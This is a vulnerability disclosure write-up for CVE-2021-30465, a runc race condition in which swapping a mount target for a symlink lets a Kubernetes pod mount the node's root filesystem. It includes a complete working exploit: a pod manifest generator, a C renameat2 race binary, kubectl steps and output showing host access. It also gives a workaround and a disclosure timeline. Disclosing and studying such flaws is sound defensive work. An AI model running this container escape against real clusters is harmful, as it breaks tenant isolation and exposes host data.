runc mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs (CVE-2021-30465)
It’s November 2020 and I’m troubleshooting a container running on K8S that is doing tons of writes to the local disk. As those writes are just temporary state, I quickly add an emptyDir tmpfs volume at /var/run, open a ticket so that my devs make it permanent, and call it a day.
Some time later, looking at mount output, I notice that this new tmpfs is mounted at /run instead of /var/run, which I had missed earlier and which surprises me a bit. /var/run is a symlink to ../run, and a quick test confirms that having mount follow symlinks in the target path is normal Linux behavior, so I start wondering how containerd/runc makes sure the mounts stay inside the container rootfs.
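For reference, here is a minimal Go sketch of that quick test, assuming root privileges and the golang.org/x/sys/unix package; the temporary directory and names are purely illustrative. It mounts a tmpfs "on" a symlink and shows the mount ending up at the symlink's destination:

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"path/filepath"
	"strings"

	"golang.org/x/sys/unix"
)

func main() {
	// Scratch directory with a real dir and a symlink pointing at it.
	dir, err := os.MkdirTemp("", "mntdemo")
	if err != nil {
		panic(err)
	}
	realDir := filepath.Join(dir, "real")
	link := filepath.Join(dir, "link")
	if err := os.Mkdir(realDir, 0o755); err != nil {
		panic(err)
	}
	if err := os.Symlink("real", link); err != nil {
		panic(err)
	}

	// Ask for a tmpfs "at" the symlink; the kernel follows it.
	if err := unix.Mount("tmpfs", link, "tmpfs", 0, ""); err != nil {
		panic(err)
	}

	// The mount shows up on .../real, not .../link.
	f, err := os.Open("/proc/self/mountinfo")
	if err != nil {
		panic(err)
	}
	defer f.Close()
	sc := bufio.NewScanner(f)
	for sc.Scan() {
		if strings.Contains(sc.Text(), dir) {
			fmt.Println(sc.Text())
		}
	}
}
```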
After following the code responsible for the mounts, I end up reading the comment on securejoin.SecureJoinVFS():
    // Note that the guarantees provided by this function only apply if the path
    // components in the returned string are not modified (in other words are not
    // replaced with symlinks on the filesystem) after this function has returned.
    // Such a symlink race is necessarily out-of-scope of SecureJoin.
As soon as you read this, you know that the race condition exists; the question is how to exploit it to escape to the K8S host.
POC
When mounting a volume, runc trusts the source and lets the kernel follow symlinks, but it does not trust the target argument: it uses the ‘filepath-securejoin’ library to resolve any symlinks and ensure the resolved target stays inside the container root. As explained in the SecureJoinVFS() documentation, using this function is only safe if you know that the checked path is not going to be replaced by a symlink afterwards; the problem is that we can replace it with a symlink. In K8S there is a trivial way to control the target: create a pod with multiple containers sharing some volumes, one with a correct image, and the other ones with non-existent images so they don’t start right away.
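To make the race window concrete, here is a minimal Go sketch of that check-then-use pattern; it is not runc’s actual code, it just assumes the github.com/cyphar/filepath-securejoin and golang.org/x/sys/unix packages, and the function and paths are illustrative:

```go
// Sketch of the vulnerable check-then-use pattern (simplified, not runc's
// actual code). SecureJoin() resolves the destination so that it stays
// under rootfs, but the kernel resolves the path again inside mount(),
// so swapping a directory for a symlink in between can move the mount
// outside the rootfs.
package main

import (
	"log"

	securejoin "github.com/cyphar/filepath-securejoin"
	"golang.org/x/sys/unix"
)

func bindMountIntoRootfs(rootfs, source, dest string) error {
	// Check: resolve dest inside rootfs, following any existing symlinks safely.
	target, err := securejoin.SecureJoin(rootfs, dest)
	if err != nil {
		return err
	}

	// <-- race window: another process can swap a component of `target`
	//     for a symlink here, e.g. via renameat2(..., RENAME_EXCHANGE).

	// Use: mount() follows symlinks in `target` again.
	return unix.Mount(source, target, "", unix.MS_BIND|unix.MS_REC, "")
}

func main() {
	// Hypothetical paths, for illustration only.
	if err := bindMountIntoRootfs("/tmp/rootfs", "/tmp/volumes/test2", "/test1/mnt1"); err != nil {
		log.Fatal(err)
	}
}
```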
Let’s start with the POC first and the explanations after
- Create our attack POD:

      kubectl create -f - <<EOF
      apiVersion: v1
      kind: Pod
      metadata:
        name: attack
      spec:
        terminationGracePeriodSeconds: 1
        containers:
        - name: c1
          image: ubuntu:latest
          command: [ "/bin/sleep", "inf" ]
          env:
          - name: MY_POD_UID
            valueFrom:
              fieldRef:
                fieldPath: metadata.uid
          volumeMounts:
          - name: test1
            mountPath: /test1
          - name: test2
            mountPath: /test2
      $(for c in {2..20}; do cat <<EOC
        - name: c$c
          image: donotexists.com/do/not:exist
          command: [ "/bin/sleep", "inf" ]
          volumeMounts:
          - name: test1
            mountPath: /test1
      $(for m in {1..4}; do cat <<EOM
          - name: test2
            mountPath: /test1/mnt$m
      EOM
      done
      )
          - name: test2
            mountPath: /test1/zzz
      EOC
      done
      )
        volumes:
        - name: test1
          emptyDir:
            medium: "Memory"
        - name: test2
          emptyDir:
            medium: "Memory"
      EOF
- Compile race.c (a simple binary that keeps calling renameat2(dir, symlink, RENAME_EXCHANGE)):

      cat > race.c <<'EOF'
      #define _GNU_SOURCE
      #include <fcntl.h>
      #include <stdio.h>
      #include <stdlib.h>
      #include <sys/types.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <sys/syscall.h>

      int main(int argc, char *argv[])
      {
          if (argc != 4) {
              fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]);
              exit(EXIT_FAILURE);
          }
          char *name1 = argv[1];
          char *name2 = argv[2];
          char *linkdest = argv[3];

          int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
          if (dirfd < 0) {
              perror("Error open CWD");
              exit(EXIT_FAILURE);
          }
          /* name1 starts as a real directory, name2 as a symlink to linkdest */
          if (mkdir(name1, 0755) < 0) {
              perror("mkdir failed");
              //do not exit
          }
          if (symlink(linkdest, name2) < 0) {
              perror("symlink failed");
              //do not exit
          }
          /* atomically swap the directory and the symlink, forever */
          while (1) {
              renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE);
          }
      }
      EOF
      gcc race.c -O3 -o race
- Wait for container c1 to start, upload the ‘race’ binary to it, and exec bash:

      sleep 30 # wait for the first container to start
      kubectl cp race -c c1 attack:/test1/
      kubectl exec -ti pod/attack -c c1 -- bash
You now have a shell in container c1.
- Create the following symlink (explanations later):

      ln -s / /test2/test2
- Launch ‘race’ multiple times to try to exploit this TOCTOU:

      cd test1
      seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
- Now that everything is ready, in a second shell, update the images so that the other containers can start:

      for c in {2..20}; do
        kubectl set image pod attack c$c=ubuntu:latest
      done
- Wait a bit and look at the results:

      for c in {2..20}; do
        echo ~~ Container c$c ~~
        kubectl exec -ti pod/attack -c c$c -- ls /test1/zzz
      done

  The output looks like this:

      ~~ Container c2 ~~
      test2
      ~~ Container c3 ~~
      test2
      ~~ Container c4 ~~
      test2
      ~~ Container c5 ~~
      bin dev home lib64 mnt postinst root sbin tmp var boot etc lib lost+found opt proc run sys usr
      ~~ Container c6 ~~
      bin dev home lib64 mnt postinst root sbin tmp var boot etc lib lost+found opt proc run sys usr
      ~~ Container c7 ~~
      error: unable to upgrade connection: container not found ("c7")
      ~~ Container c8 ~~
      test2
      ~~ Container c9 ~~
      bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
      ~~ Container c10 ~~
      test2
      ~~ Container c11 ~~
      bin dev home lib64 mnt postinst root sbin tmp var boot etc lib lost+found opt proc run sys usr
      ~~ Container c12 ~~
      test2
      ~~ Container c13 ~~
      test2
      ~~ Container c14 ~~
      test2
      ~~ Container c15 ~~
      bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
      ~~ Container c16 ~~
      error: unable to upgrade connection: container not found ("c16")
      ~~ Container c17 ~~
      error: unable to upgrade connection: container not found ("c17")
      ~~ Container c18 ~~
      bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
      ~~ Container c19 ~~
      error: unable to upgrade connection: container not found ("c19")
      ~~ Container c20 ~~
      test2
On my first try running this POC, 6 containers ended up with /test1/zzz being the node’s /, some containers failed to start, and the remaining ones were not affected.
Even without the ability to update images, we could use a fast registry for c1 and a slow registry or a large image for c2+; we just need c1 to start one second before the others.
Tests were done on the following GKE cluster:
    gcloud beta container --project "delta-array-282919" clusters create "toctou" \
      --zone "us-central1-c" --no-enable-basic-auth --cluster-version "1.18.12-gke.1200" \
      --release-channel "rapid" --machine-type "e2-medium" --image-type "COS_CONTAINERD" \
      --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true \
      --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" \
      --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias \
      --network "projects/delta-array-282919/global/networks/default" \
      --subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" \
      --default-max-pods-per-node "110" --no-enable-master-authorized-networks \
      --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair \
      --max-surge-upgrade 1 --max-unavailable-upgrade 0 --enable-shielded-nodes
K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs
Explanations
I haven’t dug too deep into the code and relied on strace to understand what was happening, and I did the investigation about a month before finally getting a working POC, so details are fuzzy, but here is my understanding:
- K8S prepares all the volumes for the pod in /var/lib/kubelet/pods/$MY_POD_UID/volumes/VOLUME-TYPE/VOLUME-NAME (in my POC I’m using the fact that the path is known, but looking at /proc/self/mountinfo leaks all you need to find the path)
- containerd prepares the rootfs at /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs
- runc calls unshare(CLONE_NEWNS) and sets the mount propagation to MS_SLAVE, thus preventing the following mount operations from affecting other containers or the node directly
- runc bind mounts the K8S volumes
- runc calls securejoin.SecureJoin() to resolve the destination/target
- runc calls mount()
- K8S doesn’t give us control over the mount source, but we have full control over the target of the mount, so the trick is to mount a directory containing a symlink over the K8S volumes path, so that the next mount uses this new source and gives us access to the node root filesystem.
From the node, the filesystem looks like this:

    /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1
    /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
    /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
    /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2
    ...
    /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2/test2 -> /
Our race binary is constantly swapping mntX and mnt-tmpX. When c2+ start, they do the following mounts:
    mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/mntX)

which, as the volume is bind mounted into the container rootfs, is equivalent to:

    mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)
If we are lucky, mntX is a directory when SecureJoin() is called, and has been swapped for a symlink by the time mount() is called; as mount() follows symlinks, this gives us:

    mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/)
The filesystem now looks like:

    /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2 -> /
When we do the final mount:

    mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)

it resolves to:

    mount(/, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)
And we now have full access to the whole node root, including /dev, /proc, all the tmpfs and overlay mounts of the other containers, everything :)
Workaround
A possible workaround is to forbid mounting volumes inside other volumes (i.e., a volume whose mountPath is under another volume’s mountPath), but as usual, upgrading is recommended.
Comments
This POC is far from being optimal and, as already stated, being able to update the image is not mandatory.
It took me a few tries to get a working POC. At first I was trying to simply mount the tmpfs volume over a host path (/root/.ssh) to impact the host, but this doesn’t work: the mounts happen in a new mount namespace (with the right mount propagation set), so they are not visible in the host mount namespace.
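For reference, here is a minimal Go sketch of that kind of isolation (simplified, not runc’s actual code; assumes root privileges and the golang.org/x/sys/unix package):

```go
// Sketch of the mount isolation runc establishes before mounting volumes
// (simplified, not runc's actual code). After this, mounts made by the
// process stay in its private mount namespace and do not propagate back
// to the host.
package main

import (
	"log"
	"runtime"

	"golang.org/x/sys/unix"
)

func main() {
	// Unshare affects the calling thread, so pin the goroutine to it.
	runtime.LockOSThread()
	defer runtime.UnlockOSThread()

	// New mount namespace for this process.
	if err := unix.Unshare(unix.CLONE_NEWNS); err != nil {
		log.Fatal(err)
	}
	// Make every mount point a slave (recursively): events from the host
	// still propagate in, but our mounts never propagate back out.
	if err := unix.Mount("", "/", "", unix.MS_SLAVE|unix.MS_REC, ""); err != nil {
		log.Fatal(err)
	}
	// Any mounts performed from here on are invisible to the host mount
	// namespace, which is why the /root/.ssh approach failed.
}
```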
I then tried a golang version of the race binary with 4 containers and 20 volumes, and it always failed. I switched to a C version (not sure it makes a difference), with 19 containers and 4 mounts, and this worked, giving me 6 containers out of 19 with the host mounted.
Even with newer syscalls like openat2(), you still need to mount(/proc/self/fd/X, /proc/self/fd/Y) to be race free. I’m not sure how useful a new mount flag that fails when one of the parameters is a symlink would be, but the current behavior is a huge footgun.
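Here is a minimal Go sketch of that fd-based approach, under the assumption that openat2() with RESOLVE_IN_ROOT is available (Linux 5.6+) and using the golang.org/x/sys/unix package; it illustrates the idea, not runc’s actual fix, and the paths are hypothetical:

```go
// Sketch of a race-free(ish) mount: resolve the target inside the rootfs
// with openat2(RESOLVE_IN_ROOT), then mount onto /proc/self/fd/<n> so the
// kernel uses the inode we already hold, not a path an attacker can swap.
package main

import (
	"fmt"
	"log"

	"golang.org/x/sys/unix"
)

func bindMountIntoRootfs(rootfs, source, dest string) error {
	rootfd, err := unix.Open(rootfs, unix.O_PATH|unix.O_CLOEXEC, 0)
	if err != nil {
		return err
	}
	defer unix.Close(rootfd)

	// Resolve dest relative to rootfs; symlinks cannot escape the root.
	how := unix.OpenHow{
		Flags:   unix.O_PATH | unix.O_CLOEXEC,
		Resolve: unix.RESOLVE_IN_ROOT,
	}
	targetfd, err := unix.Openat2(rootfd, dest, &how)
	if err != nil {
		return err
	}
	defer unix.Close(targetfd)

	// Mount onto the held fd via /proc/self/fd, not onto the original path.
	target := fmt.Sprintf("/proc/self/fd/%d", targetfd)
	return unix.Mount(source, target, "", unix.MS_BIND|unix.MS_REC, "")
}

func main() {
	// Hypothetical paths, for illustration only.
	if err := bindMountIntoRootfs("/tmp/rootfs", "/tmp/volumes/test2", "/test1/mnt1"); err != nil {
		log.Fatal(err)
	}
}
```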
This vulnerability exists because having untrusted/restricted container definitions was not part of the initial threat model of Docker/runc and was added later by K8S. You can sometimes read that K8S is multi-tenant, but you have to understand it as multiple trusted teams, not as giving API access to strangers.
On February 24th, Google introduced GKE Autopilot: fully managed K8S clusters with an emphasis on security and, in theory, no access to the node, so after testing I also reported this issue to them.
Timeline
- 2020-11-??: Discover the SecureJoinVFS() comment
- 2020-12-26: Initial report to security@opencontainers.org (Merry Christmas :) )
- 2020-12-27: Report acknowledgment
- 2021-03-06: Report to Google for their new GKE Autopilot
- 2021-04-07: Got added to discussions around the fix
- 2021-04-08: Google bounty :) (to be donated to Handicap International)
- 2021-05-19: End of embargo, advisory published on GitHub and on OSS-Security
- 2021-05-30: Write-up + POC public
Acknowledgments
Thanks to Aleksa Sarai (runc maintainer) for his fast responses and all his work, to Noah Meyerhans and Samuel Karp for their help fixing and testing, and to Google for the bounty.